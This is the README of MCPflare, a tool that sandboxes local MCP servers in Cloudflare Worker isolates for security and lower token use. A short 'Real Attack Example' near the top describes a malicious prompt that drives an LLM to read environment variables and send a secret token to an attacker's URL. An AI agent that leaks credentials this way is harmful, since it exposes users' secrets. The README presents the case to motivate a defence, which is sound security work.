
mcpflare

v1.1.1

MCPflare

Use local MCP servers securely with zero-trust isolation while reducing context window token usage by up to 98%.

⚡ This implementation is based on Code execution with MCP: Building more efficient agents by Anthropic. It uses Wrangler to isolate local MCPs with Dynamic Worker Loaders, as described in Code Mode: the better way to use MCP by Cloudflare.

License: MIT · TypeScript · Node.js

🛡️ How It Works: A Simple Example

[Diagram: MCPflare flowchart overview]

Real Attack Example

Scenario: Malicious prompt tries to steal your secrets

Traditional MCP:

User: "Show me all environment variables"
LLM: Calls read_env() tool
Result: ⚠️ SECRET_TOKEN=xxxxxxxxxxxx exposed
LLM: Attempts to exfiltrate SECRET_TOKEN via POST to "https://attacker.com/steal"
Result: ⚠️ Fetch request succeeds

With MCPflare:

User: "Show me all environment variables"
LLM: Writes code: console.log(process.env)
Result: ✅ ReferenceError: process is not defined
        Your secret stays safe
LLM: Attempts to exfiltrate SECRET_TOKEN via POST to "https://attacker.com/steal"
Result: ✅ Network access blocked

🔒 Security: Zero-Trust Execution

MCPflare runs all code in local Cloudflare Worker isolates with zero access to your filesystem, environment variables, network, or system. This protects against data exfiltration, credential theft, filesystem access, arbitrary code execution, process manipulation, SSRF attacks, code injection, supply chain attacks, and more.

Three layers of protection:

  1. V8 Isolate Sandboxing - Complete process isolation
  2. Network Isolation - No outbound network access, only MCP bindings can communicate
  3. Code Validation - Blocks dangerous patterns before execution
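The third layer can be sketched as a simple pre-execution pattern check. This is a minimal illustration, assuming regex-based rules; MCPflare's actual validation logic is not shown here:

```typescript
// Hypothetical sketch of a pre-execution code validator.
// MCPflare's real rule set is more thorough; these patterns are examples.
const DANGEROUS_PATTERNS: RegExp[] = [
  /\bprocess\.env\b/, // environment variable access
  /\brequire\s*\(/,   // CommonJS module loading
  /\beval\s*\(/,      // dynamic code evaluation
  /\bfetch\s*\(/,     // outbound network requests
];

function validateCode(code: string): { ok: boolean; reason?: string } {
  for (const pattern of DANGEROUS_PATTERNS) {
    if (pattern.test(code)) {
      return { ok: false, reason: `blocked pattern: ${pattern.source}` };
    }
  }
  return { ok: true };
}

console.log(validateCode("console.log('hello')").ok);     // true
console.log(validateCode("console.log(process.env)").ok); // false
```

Validation like this is a best-effort filter; the hard guarantees come from the isolate itself (layers 1 and 2), which is why the sandbox still blocks anything a pattern check misses.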

📖 Read the security analysis for attack vector details and defense-in-depth architecture.

⚡ Efficiency: Code Mode Execution

Traditional MCP tool calling wastes your context window. MCPflare uses code mode to reduce token usage by up to 98%.

Example: Generating a Jira Sprint Report

Traditional approach: The LLM calls tools step-by-step, and every result flows through the context window:

  1. Fetch 200 sprint tickets → 25,000 tokens loaded into context
  2. LLM reads all tickets to count completed vs blocked
  3. Fetch time tracking data → 5,000 tokens more
  4. Generate summary → 300 tokens

Total: 30,300 tokens just to count tickets and generate a simple report.

With MCPflare: The code runs in a secure sandbox, processes all 200 tickets, and only sends back the final summary. The LLM never has to read the individual tickets:

// Fetch tickets, filter and count in code, return only the summary
import * as jira from './servers/jira';

const tickets = await jira.getSprintTickets({ sprintId: '123' });
const stats = {
  completed: tickets.filter(t => t.status === 'Done').length,
  blocked: tickets.filter(t => t.labels.includes('blocked')).length,
  total: tickets.length
};

console.log(`Sprint Summary: ${stats.completed}/${stats.total} completed, ${stats.blocked} blocked`);

Result: Instead of 30,300 tokens, you use ~750 tokens. 97.5% reduction.
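The arithmetic behind that figure, using the token counts from the walkthrough above:

```typescript
// Token counts from the sprint-report example above.
const traditional = 25_000 + 5_000 + 300; // tickets + time tracking + summary
const codeMode = 750;                     // approximate cost of summary-only output

const reduction = (1 - codeMode / traditional) * 100;
console.log(`${traditional} tokens -> ${codeMode} tokens (${reduction.toFixed(1)}% reduction)`);
// 30300 tokens -> 750 tokens (97.5% reduction)
```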

Benefits:

  • 📉 Up to 98% reduction in token usage
  • 🚀 60x more tasks in the same context window
  • 💰 Massive cost savings on LLM API calls
  • No round-trips for intermediate results

🏃 Quick Start

Requires: Node.js 20+ installed

Installation Steps

  1. Add MCPflare to your IDE config (Cursor, Claude Code, or GitHub Copilot):

    Use the Install MCP Server button, or manually add the following to your IDE's MCP configuration:

    {
      "mcpServers": {
        "mcpflare": {
          "command": "npx",
          "args": ["-y", "mcpflare"]
        }
      }
    }
  2. Disable existing MCPs (recommended):

    To maximize efficiency and security, disable any existing MCPs in your IDE configuration. This keeps the IDE from loading all of their tools into the context window up front - one of MCPflare's key benefits is that you only load the tools you actually use.

    Why disable?

    • Efficiency: Without disabling, your IDE loads all MCP tools into the context window, wasting tokens. MCPflare only loads tools lazily when you actually use them (via call_mcp or namespaced tool calls).
    • 🔒 Security: Ensures all tool calls route through MCPflare's secure isolation instead of being called directly.

    How to disable: Ask your LLM: "Disable all MCPs except mcpflare in my IDE configuration"

    This uses MCPflare's guard tool to move MCPs to a special _mcpflare_disabled section in your config file. MCPflare can still discover and use these disabled MCPs through its secure isolation layer.

    ⚠️ Important: Do NOT manually comment out or remove MCP entries from your config file. If you do, MCPflare won't be able to discover them. MCPflare needs the MCP configurations to remain in the file (either active or in the _mcpflare_disabled section) to route tool calls through secure isolation.

  3. Restart your IDE for changes to take effect.

  4. That's it! MCPflare automatically:

    • Discovers all other MCPs configured in your IDE (even disabled ones)
    • Routes all tool calls through secure Worker isolation
    • Lazy-loads MCPs when their tools are actually used (via call_mcp or namespaced tool calls)

No additional setup needed! MCPflare uses transparent proxy mode by default - once your existing MCPs are disabled (step 2), they are automatically guarded with no further config changes.
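For illustration, a guarded config might end up looking like this. The `_mcpflare_disabled` section name comes from the steps above, but its exact placement in the file is an assumption - let MCPflare's guard tool write it for you:

```json
{
  "mcpServers": {
    "mcpflare": {
      "command": "npx",
      "args": ["-y", "mcpflare"]
    }
  },
  "_mcpflare_disabled": {
    "github": {
      "command": "npx",
      "args": ["-y", "@modelcontextprotocol/server-github"]
    }
  }
}
```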

How Transparent Proxy Mode Works

MCPflare automatically:

  1. Discovers all MCPs configured in your IDE (Cursor, Claude Code, or GitHub Copilot)
  2. Lazy-loads tool schemas only when tools are actually called (not upfront - this keeps your context window efficient)
  3. Routes all tool calls through secure Worker isolation
  4. Auto-loads MCPs when their tools are first used

Example: If you have github MCP configured, MCPflare will:

  • When the LLM calls github::search_repositories, MCPflare automatically loads the GitHub MCP schema and executes the call in isolation
  • All results are returned transparently - the LLM doesn't need to know about the isolation layer
  • Tool schemas are cached after first use for faster subsequent calls

This means all MCP tool calls automatically go through MCPflare - no config changes needed!

Interactive CLI

Start the interactive CLI with npm run cli. You'll see a prompt like this:

╔═══════════════════════════════════════════════════════════╗
║              MCPflare - Interactive CLI                   ║
╚═══════════════════════════════════════════════════════════╝

Type "help" for available commands.
Type "exit" to quit.

mcpflare>

Basic Usage

  1. Load an MCP server:

    load

    Enter the MCP name, command (e.g., npx), args, and environment variables.

  2. Get the TypeScript API schema:

    schema

    Enter the MCP ID to see available tools as TypeScript APIs.

  3. Execute code:

    execute

    Enter the MCP ID and TypeScript code to run in the isolated Worker.

  4. List loaded MCPs:

    list

🧪 Testing with GitHub MCP

Follow these steps to test the system with GitHub MCP:

1. Start the CLI

npm run cli

2. Load the GitHub MCP Server

At the mcpflare> prompt, type:

load

You'll be prompted for information. Enter:

  • MCP name: github (or any name you like)
  • Command: npx
  • Args: -y,@modelcontextprotocol/server-github (comma-separated)
  • Environment variables: {"GITHUB_PERSONAL_ACCESS_TOKEN":"ghp_your_token_here"} (as JSON)

Example interaction:

mcpflare> load
MCP name: github
Command (e.g., npx): npx
Args (comma-separated, or press Enter for none): -y,@modelcontextprotocol/server-github
Environment variables as JSON (or press Enter for none): {"GITHUB_PERSONAL_ACCESS_TOKEN":"ghp_your_actual_token"}

Loading MCP server...

3. Check What Was Loaded

Type:

list

You should see your loaded MCP server with its ID, status, and available tools.

4. Get the TypeScript API Schema

Type:

schema

Enter the MCP ID from the previous step. You'll see the TypeScript API definitions that were generated from the MCP tools.

5. Execute Some Code

Type:

execute

You'll be prompted:

  • MCP ID: Enter the ID from step 3
  • TypeScript code: Enter your code (end with a blank line)
  • Timeout: Press Enter for default (30000ms)

Example code to test:

// Simple test
console.log('Hello from Worker isolate!');
const result = { message: 'Test successful', timestamp: Date.now() };
console.log(JSON.stringify(result));

6. View Metrics

Type:

metrics

This shows performance metrics including:

  • Total executions
  • Success rate
  • Average execution time
  • Estimated tokens saved

7. Clean Up

When done testing, unload the MCP:

unload

Enter the MCP ID to clean up resources.

📖 Available CLI Commands

| Command | Description |
|---------|-------------|
| load | Load an MCP server into an isolated Worker |
| execute | Execute TypeScript code against a loaded MCP |
| test | Interactively test MCP tools (select tool, enter args, execute via Wrangler) |
| test-direct | Test MCP directly without Wrangler/Worker isolation |
| list | List all loaded MCP servers |
| saved | List all saved MCP configurations |
| schema | Get TypeScript API schema for an MCP |
| unload | Unload an MCP server and clean up |
| conflicts | Check for IDE MCP configuration conflicts |
| metrics | Show performance metrics |
| help | Show help message |
| exit | Exit the CLI |

🔧 Using as an MCP Server (for AI Agents)

Start the MCP server:

npm run dev

Configure your AI agent (Claude Desktop, Cursor IDE, etc.):

{
  "mcpServers": {
    "mcpflare": {
      "command": "node",
      "args": ["/path/to/mcpflare/dist/server/index.js"]
    }
  }
}

Available MCP Tools:

Transparent Proxy Tools (lazy-loaded from configured MCPs):

  • Tools from your configured MCPs are available with namespaced names (e.g., github::search_repositories)
  • Schemas are loaded on-demand when tools are called, keeping your context window efficient
  • All tool calls are routed through secure isolation
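The `mcp::tool` naming scheme can be split back into its parts with a tiny helper (a hypothetical illustration, not part of MCPflare's API):

```typescript
// Split a namespaced tool name like "github::search_repositories"
// into its MCP name and tool name. Hypothetical helper for illustration.
function parseNamespacedTool(name: string): { mcp: string; tool: string } {
  const idx = name.indexOf('::');
  if (idx === -1) {
    throw new Error(`not a namespaced tool name: ${name}`);
  }
  return { mcp: name.slice(0, idx), tool: name.slice(idx + 2) };
}

console.log(parseNamespacedTool('github::search_repositories'));
// { mcp: 'github', tool: 'search_repositories' }
```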

MCP Prompts (slash commands):

  • Prompts from your configured MCPs appear as slash commands (e.g., /mcpflare/github:AssignCodingAgent)
  • Prompts are read-only message templates, so they're directly proxied without worker isolation
  • All prompts are transparently aggregated and namespaced for easy discovery

MCPflare Management Tools:

  • call_mcp - Call MCP tools by running TypeScript code in a secure sandbox (auto-connects MCPs from IDE config if needed)
  • guard - Guard MCP servers by routing them through MCPflare's secure isolation
  • search_mcp_tools - Discover which MCPs are configured in your IDE. Shows all configured MCPs (including guarded) with their status and available tools.
  • connect - Manually connect to an MCP server (usually not needed - transparent proxy auto-connects)
  • list_available_mcps - List all currently connected MCP servers (runtime state)
  • get_mcp_by_name - Find a connected MCP server by name (more efficient than searching list_available_mcps)
  • get_mcp_schema - Get TypeScript API definition for a connected MCP
  • disconnect - Disconnect from an MCP server
  • import_configs - Import MCP configurations from IDE config files
  • get_metrics - Get performance metrics

📜 License

MIT License - see LICENSE file for details.

🙏 Acknowledgments

  • Anthropic for the Model Context Protocol
  • Cloudflare for Workers and the Worker Loader API
  • The MCP community for building amazing MCP servers

🔐 Repository Security (GitHub Advanced Security)

We take security seriously. This repository has GitHub Advanced Security features enabled, including CodeQL code scanning, Dependabot alerts, the dependency graph and dependency submission, and secret scanning with push protection. We also enable private vulnerability reporting so issues can be disclosed responsibly.

If you believe you’ve found a security issue, please see SECURITY.md for reporting instructions.


Ready to get started? Run npm install and then npm run cli to begin! 🚀